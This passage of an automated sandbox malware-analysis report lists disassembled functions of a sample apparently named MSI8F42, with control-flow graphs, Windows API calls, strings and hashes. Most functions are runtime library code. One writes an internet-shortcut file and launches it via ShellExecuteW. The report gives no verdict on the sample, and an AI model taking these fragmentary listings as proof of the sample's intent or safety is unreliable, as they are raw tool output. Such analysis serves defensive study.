                                                                                                                                            • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3471368781-0
                                                                                                                                            • Opcode ID: 0cb3201fd3cd48f89452069e6af2a5f2ffa22dd122a9ad50e2f67d98b25392f1
                                                                                                                                            • Instruction ID: d2c2bf281c6011309b243011ecc4dae1e90610140ea6c577db0f64fb13a10734
                                                                                                                                            • Opcode Fuzzy Hash: 0cb3201fd3cd48f89452069e6af2a5f2ffa22dd122a9ad50e2f67d98b25392f1
                                                                                                                                            • Instruction Fuzzy Hash: 7AB106755007119BDB3AAF28EC92BBBB3A8FF44308F15456DE983C6580EA75E981C710
                                                                                                                                            Function 0031C2CA Relevance: .2, Instructions: 158COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
                                                                                                                                            • Instruction ID: ea15547d4376e6fa7b5cd42a0285d89ad4d2508d4e19830693e0019af17e2b98
                                                                                                                                            • Opcode Fuzzy Hash: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
                                                                                                                                            • Instruction Fuzzy Hash: 3C517472E00219EFDF19CF99C991AEEBBB5EF88310F598059E815AB201C7349E50CB51
                                                                                                                                            Function 00314920 Relevance: .1, Instructions: 76COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                            • Instruction ID: 6e9efd554a92782676e9fee3cc7d77d575897f70cd382d9908865ae93333d788
                                                                                                                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                            • Instruction Fuzzy Hash: 2B1108B720114243D61EC63EC5B45FBE395EBCE32572E436AD1918BB58D322A9C59A00
                                                                                                                                            Function 0032AD78 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
                                                                                                                                            • Instruction ID: 7a4f772b803dd70de8e20d8dca8df84c8d9565bb6d79435ada8d12cae649379e
                                                                                                                                            • Opcode Fuzzy Hash: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
                                                                                                                                            • Instruction Fuzzy Hash: F7E08C72911238EBCB16DB9CD92498AF3ECFB84B01B15049AF501D7501C270DE00D7D1
                                                                                                                                            Function 00322DCC Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
                                                                                                                                            • Instruction ID: 18a618512c6ead58debc1e5188d366f5ac254a152f5de2192bb80221b535565a
                                                                                                                                            • Opcode Fuzzy Hash: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
                                                                                                                                            • Instruction Fuzzy Hash: BBC08C34040E2057CE2B8E10AEB13BA3394B791783F80058CC4130BA46C52EAC83D641
                                                                                                                                            Function 00310116 Relevance: 30.3, APIs: 20, Instructions: 287COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 523 310116-31013f call 31325f call 30edf2 528 310141-31014d call 2f8c20 523->528 529 31019d-3101a2 523->529 537 31018a-31019a call 30e843 call 2ff3d9 528->537 538 31014f-310151 528->538 531 3101f1-3101f3 529->531 532 3101a4-3101b2 call 2f8c20 529->532 535 310390-310392 531->535 536 3101f9-310207 call 2f8c20 531->536 545 3101b4 532->545 546 3101dd-3101eb call 30e8d8 call 2ff3d9 532->546 541 310450-310455 call 31323c 535->541 542 310398-3103a6 call 2f8c20 535->542 555 310325-31038a call 30e96d call 2ff3d9 call 2f8c20 call 30ea02 call 2ff3d9 call 2f8c20 call 30eb2c call 2ff3d9 call 2f8c20 call 30ea97 call 2ff3d9 536->555 556 31020d 536->556 537->529 544 310154 call 2f6330 538->544 565 310422-31044d call 30ebc1 call 2ff3d9 call 2f8c20 call 30ec56 call 2ff3d9 542->565 566 3103a8 542->566 553 310159-310161 544->553 554 3101b6 call 2f6330 545->554 589 3101ee 546->589 561 310163-310177 call 312344 553->561 562 310179 553->562 563 3101bb-3101c1 554->563 659 31038d 555->659 564 31020f call 2f6330 556->564 574 31017b-310188 call 2ff3d9 561->574 562->574 572 3101c3-3101cc 563->572 573 3101ce 563->573 575 310214-31021a 564->575 565->541 576 3103aa call 2f6330 566->576 582 3101d0-3101db call 2ff3d9 572->582 573->582 574->529 584 310227 575->584 585 31021c-310225 575->585 577 3103af-3103bc 576->577 587 3103cb 577->587 588 3103be-3103c9 call 30eceb 577->588 582->589 586 310229-310240 call 2ff3d9 call 2f8c20 584->586 585->586 613 310242 call 2f6330 586->613 597 3103cd-3103e8 call 2ff3d9 call 2f8c20 587->597 588->597 589->531 618 3103ea call 2f6330 597->618 617 310247-31024d 613->617 621 31025b 617->621 622 31024f-310259 617->622 623 3103ef-3103f7 618->623 626 31025d-310274 call 2ff3d9 call 2f8c20 621->626 622->626 627 310413 623->627 628 3103f9-310411 call 3100ed 623->628 644 310277 call 2f6330 626->644 630 310415-310420 call 2ff3d9 627->630 628->630 630->541 646 31027c-31028b 644->646 647 3102b2 646->647 648 31028d-3102b0 call 30ffea 646->648 651 3102b4-3102d1 call 2ff3d9 call 2f8c20 647->651 648->651 661 3102d4 call 2f6330 651->661 659->535 662 3102d9-3102e8 661->662 663 310310 662->663 664 3102ea-31030e call 30ffea 662->664 666 310312-310323 call 2ff3d9 663->666 664->666 666->659
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0031011D
                                                                                                                                            • collate.LIBCPMT ref: 00310126
                                                                                                                                              • Part of subcall function 0030EDF2: __EH_prolog3_GS.LIBCMT ref: 0030EDF9
                                                                                                                                              • Part of subcall function 0030EDF2: __Getcoll.LIBCPMT ref: 0030EE5D
                                                                                                                                            • __Getcoll.LIBCPMT ref: 0031016C
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00310180
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00310195
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 003101D3
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 003101E6
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0031022C
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00310260
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0031031B
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0031032E
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0031034B
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00310368
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00310385
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 003102BD
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • numpunct.LIBCPMT ref: 003103C4
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 003103D4
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00310418
                                                                                                                                              • Part of subcall function 002F6330: LocalAlloc.KERNEL32(00000040,?,00300E04,00000020,?,?,002F9942,00000000,7642E7B1,?,?,?,?,003350DD,000000FF), ref: 002F6336
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0031042B
                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00310448
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddfacLocimp::_Locimp_std::locale::_$GetcollLockitstd::_$AllocH_prolog3H_prolog3_LocalLockit::_Lockit::~_collatenumpunct
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3717464618-0
                                                                                                                                            • Opcode ID: 9f7269c252549a7e6cb0eb19d30a0d726d454a37c9f9f2a717611ad3f3e023b2
                                                                                                                                            • Instruction ID: bc405e22850873421373abd7aaa36801ffe3997a7fc6d525d3c57c055f6d4c14
                                                                                                                                            • Opcode Fuzzy Hash: 9f7269c252549a7e6cb0eb19d30a0d726d454a37c9f9f2a717611ad3f3e023b2
                                                                                                                                            • Instruction Fuzzy Hash: D0916E719023196BE71A7FB04C46BBFF9A8DF44760F00487DF90AAB281DFB059504BA2
                                                                                                                                            Function 002F6600 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 319filememoryCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 670 2f6600-2f6667 call 2f3170 call 2f70a0 675 2f666b-2f6698 CreateFileW call 2f2e60 670->675 676 2f6669 670->676 679 2f669a-2f669c 675->679 680 2f66a1-2f66bd 675->680 676->675 681 2f696c-2f699f call 2f2e60 call 312937 679->681 682 2f66bf-2f66c2 680->682 683 2f6707-2f671a 680->683 682->683 684 2f66c4-2f66dd WideCharToMultiByte 682->684 685 2f6720-2f6728 683->685 687 2f66df-2f6703 LocalAlloc WideCharToMultiByte 684->687 688 2f6705 684->688 685->685 689 2f672a-2f6730 685->689 687->683 688->683 691 2f67bc-2f67f5 WriteFile CloseHandle 689->691 692 2f6736-2f673c 689->692 694 2f67fb-2f6819 691->694 695 2f68a1-2f68a6 691->695 696 2f673e-2f6741 692->696 697 2f6743-2f6746 692->697 701 2f681b-2f6835 MultiByteToWideChar 694->701 702 2f6872-2f688e call 2f64a0 694->702 699 2f694e-2f6965 LocalFree 695->699 700 2f68ac-2f68c0 call 2f70a0 695->700 696->697 703 2f67a6-2f67a8 696->703 704 2f674d-2f6750 697->704 705 2f6748-2f674b 697->705 699->681 720 2f68c4-2f68ed ShellExecuteW call 2f2e60 700->720 721 2f68c2 700->721 710 2f6869-2f686c 701->710 711 2f6837-2f6867 LocalAlloc MultiByteToWideChar 701->711 716 2f6893-2f689a 702->716 717 2f6890-2f6891 LocalFree 702->717 709 2f67ad-2f67b6 703->709 706 2f6757-2f675e 704->706 707 2f6752-2f6755 704->707 705->703 705->704 714 2f6760-2f6762 706->714 707->703 707->706 709->691 709->692 710->702 711->710 718 2f676e-2f6773 714->718 719 2f6764-2f676a 714->719 716->695 717->716 718->703 723 2f6775-2f67a4 718->723 719->714 722 2f676c 719->722 726 2f68ef-2f68ff call 2f6fb0 720->726 727 2f6902-2f6905 720->727 721->720 722->723 723->709 726->727 727->699 729 2f6907-2f691b call 2f70a0 727->729 733 2f691f-2f693f ShellExecuteW call 2f2e60 729->733 734 2f691d 729->734 733->699 737 2f6941-2f694b call 2f6fb0 733->737 734->733 737->699
                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 002F667E
                                                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 002F66D7
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 002F66E2
                                                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 002F66FE
                                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,003349E5,000000FF), ref: 002F67DB
                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,003349E5,000000FF), ref: 002F67E7
                                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,003349E5), ref: 002F682F
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,003349E5,000000FF), ref: 002F684A
                                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,003349E5), ref: 002F6867
                                                                                                                                            • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,003349E5,000000FF), ref: 002F6891
                                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 002F68D8
                                                                                                                                            • ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 002F692A
                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,003349E5,000000FF), ref: 002F695C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
                                                                                                                                            • String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
                                                                                                                                            • API String ID: 2199533872-3004881174
                                                                                                                                            • Opcode ID: fa05b49d35032bb08d14cdc4188296f83653eda6c39dcfb42f5f91000471da72
                                                                                                                                            • Instruction ID: 679218fa66c47d097eed613f639c7ed8090d6553b9902a8d6aab2b9b4b16779c
                                                                                                                                            • Opcode Fuzzy Hash: fa05b49d35032bb08d14cdc4188296f83653eda6c39dcfb42f5f91000471da72
                                                                                                                                            • Instruction Fuzzy Hash: C7B1F27191024DAFEB21DF64CC8ABFEFBA9EF05740F144129E604AB2C1D7715A18CBA1
                                                                                                                                            Function 00312B8C Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 740 312b8c-312bad InitializeCriticalSectionAndSpinCount GetModuleHandleW 741 312bc0-312bdc GetProcAddress * 2 740->741 742 312baf-312bbe GetModuleHandleW 740->742 744 312bf0-312c04 CreateEventW 741->744 745 312bde-312be0 741->745 742->741 743 312c06-312c20 call 3133a8 DeleteCriticalSection 742->743 750 312c22-312c23 CloseHandle 743->750 751 312c29 743->751 744->743 747 312bed-312bef 744->747 745->744 746 312be2-312be8 745->746 746->747 750->751
                                                                                                                                            APIs
                                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0034DD3C,00000FA0,?,?,00312B6A), ref: 00312B98
                                                                                                                                            • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00312B6A), ref: 00312BA3
                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00312B6A), ref: 00312BB4
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00312BC6
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00312BD4
                                                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00312B6A), ref: 00312BF7
                                                                                                                                            • DeleteCriticalSection.KERNEL32(0034DD3C,00000007,?,?,00312B6A), ref: 00312C13
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00312B6A), ref: 00312C23
                                                                                                                                            Strings
                                                                                                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00312B9E
                                                                                                                                            • WakeAllConditionVariable, xrefs: 00312BCC
                                                                                                                                            • SleepConditionVariableCS, xrefs: 00312BC0
                                                                                                                                            • kernel32.dll, xrefs: 00312BAF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                                                            • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                            • API String ID: 2565136772-3242537097
                                                                                                                                            • Opcode ID: 0c05cac4e3570526ba670b1fe70bb1669acd83bd77747ecf61d71fc998776535
                                                                                                                                            • Instruction ID: 831f725b2bb014ce189c2ee45e5202603d6dbc72db2f0f7251d782efd57e40fa
                                                                                                                                            • Opcode Fuzzy Hash: 0c05cac4e3570526ba670b1fe70bb1669acd83bd77747ecf61d71fc998776535
                                                                                                                                            • Instruction Fuzzy Hash: E801D4B5E48311ABD7371F79AC88ED73BAC9F4AB40F010820FD04D61A0DE74D8908AA0
                                                                                                                                            Function 00315CAF Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1485 315caf-315cda call 316c18 1488 315ce0-315ce3 1485->1488 1489 316053-316058 call 322a07 1485->1489 1488->1489 1490 315ce9-315cf2 1488->1490 1492 315cf8-315cfc 1490->1492 1493 315def-315df5 1490->1493 1492->1493 1495 315d02-315d09 1492->1495 1496 315dfd-315e0b 1493->1496 1499 315d21-315d26 1495->1499 1500 315d0b-315d12 1495->1500 1497 315e11-315e15 1496->1497 1498 315fbc-315fbf 1496->1498 1497->1498 1502 315e1b-315e22 1497->1502 1504 315fc1-315fc4 1498->1504 1505 315fe2-315feb call 31596a 1498->1505 1499->1493 1501 315d2c-315d34 call 31596a 1499->1501 1500->1499 1503 315d14-315d1b 1500->1503 1518 315d3a-315d53 call 31596a * 2 1501->1518 1519 315fed-315ff1 1501->1519 1508 315e24-315e2b 1502->1508 1509 315e3a-315e40 1502->1509 1503->1493 1503->1499 1504->1489 1506 315fca-315fdf call 316059 1504->1506 1505->1489 1505->1519 1506->1505 1508->1509 1513 315e2d-315e34 1508->1513 1515 315e46-315e6d call 31395b 1509->1515 1516 315f58-315f5c 1509->1516 1513->1498 1513->1509 1515->1516 1530 315e73-315e76 1515->1530 1521 315f68-315f74 1516->1521 1522 315f5e-315f67 call 314754 1516->1522 1518->1489 1543 315d59-315d5f 1518->1543 1521->1505 1523 315f76-315f7a 1521->1523 1522->1521 1527 315f8c-315f94 1523->1527 1528 315f7c-315f84 1523->1528 1533 315f96-315fa9 call 31596a * 2 1527->1533 1534 315fab-315fb8 call 3166be 1527->1534 1528->1505 1532 315f86-315f8a 1528->1532 1536 315e79-315e8e 1530->1536 1532->1505 1532->1527 1560 315ff2 call 323980 1533->1560 1550 316017-31602c call 31596a * 2 1534->1550 1551 315fba 1534->1551 1540 315e94-315e97 1536->1540 1541 315f39-315f4c 1536->1541 1540->1541 1546 315e9d-315ea5 1540->1546 1541->1536 1544 315f52-315f55 1541->1544 1548 315d61-315d65 1543->1548 1549 315d8b-315d93 call 31596a 1543->1549 1544->1516 1546->1541 1552 315eab-315ebf 1546->1552 1548->1549 1555 315d67-315d6e 1548->1555 1566 315d95-315db5 call 31596a * 2 call 3166be 1549->1566 1567 315df7-315dfa 1549->1567 1580 316031-31604e call 313b4e call 3165be call 31677b call 316535 1550->1580 1581 31602e 1550->1581 1551->1505 1556 315ec2-315ed2 1552->1556 1561 315d70-315d77 1555->1561 1562 315d82-315d85 1555->1562 1563 315ed4-315ee7 call 31618f 1556->1563 1564 315efa-315f07 1556->1564 1576 315ff7-316012 call 314754 call 31633a call 313e5a 1560->1576 1561->1562 1571 315d79-315d80 1561->1571 1562->1489 1562->1549 1577 315ee9-315eef 1563->1577 1578 315f0b-315f33 call 315c2f 1563->1578 1564->1556 1569 315f09 1564->1569 1566->1567 1598 315db7-315dbc 1566->1598 1567->1496 1575 315f36 1569->1575 1571->1549 1571->1562 1575->1541 1576->1550 1577->1563 1583 315ef1-315ef7 1577->1583 1578->1575 1580->1489 1581->1580 1583->1564 1598->1560 1600 315dc2-315dd5 call 316352 1598->1600 1600->1576 1605 315ddb-315de7 1600->1605 1605->1560 1606 315ded 1605->1606 1606->1600
                                                                                                                                            APIs
                                                                                                                                            • IsInExceptionSpec.LIBVCRUNTIME ref: 00315DAC
                                                                                                                                            • type_info::operator==.LIBVCRUNTIME ref: 00315DCE
                                                                                                                                            • ___TypeMatch.LIBVCRUNTIME ref: 00315EDD
                                                                                                                                            • IsInExceptionSpec.LIBVCRUNTIME ref: 00315FAF
                                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 00316033
                                                                                                                                            • CallUnexpected.LIBVCRUNTIME ref: 0031604E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                            • API String ID: 2123188842-393685449
                                                                                                                                            • Opcode ID: 0b203563ff2b359a35faa90bf1a3bba5a397cbbed2b1fe50874f30f2916be62c
                                                                                                                                            • Instruction ID: 50aed3f674e04d6e5d50f4940bb6be448062a20601ecc0bc50317a428bb919f1
                                                                                                                                            • Opcode Fuzzy Hash: 0b203563ff2b359a35faa90bf1a3bba5a397cbbed2b1fe50874f30f2916be62c
                                                                                                                                            • Instruction Fuzzy Hash: E0B15871800609EFCF1EDFA4D8819EEB7B5FF98310B15405AE8156B212D774DAA2CB91
                                                                                                                                            Function 002F4270 Relevance: 15.1, APIs: 10, Instructions: 137timeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?,7642E7B1,?,?,?), ref: 002F42D2
                                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?,?,7642E7B1,?,?,?), ref: 002F42F3
                                                                                                                                            • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,7642E7B1,?,?,?), ref: 002F4326
                                                                                                                                            • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,7642E7B1,?,?,?), ref: 002F4337
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,7642E7B1,?,?,?), ref: 002F4355
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,7642E7B1,?,?,?), ref: 002F4371
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,7642E7B1,?,?,?), ref: 002F4399
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,7642E7B1,?,?,?), ref: 002F43B5
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,7642E7B1,?,?,?), ref: 002F43D3
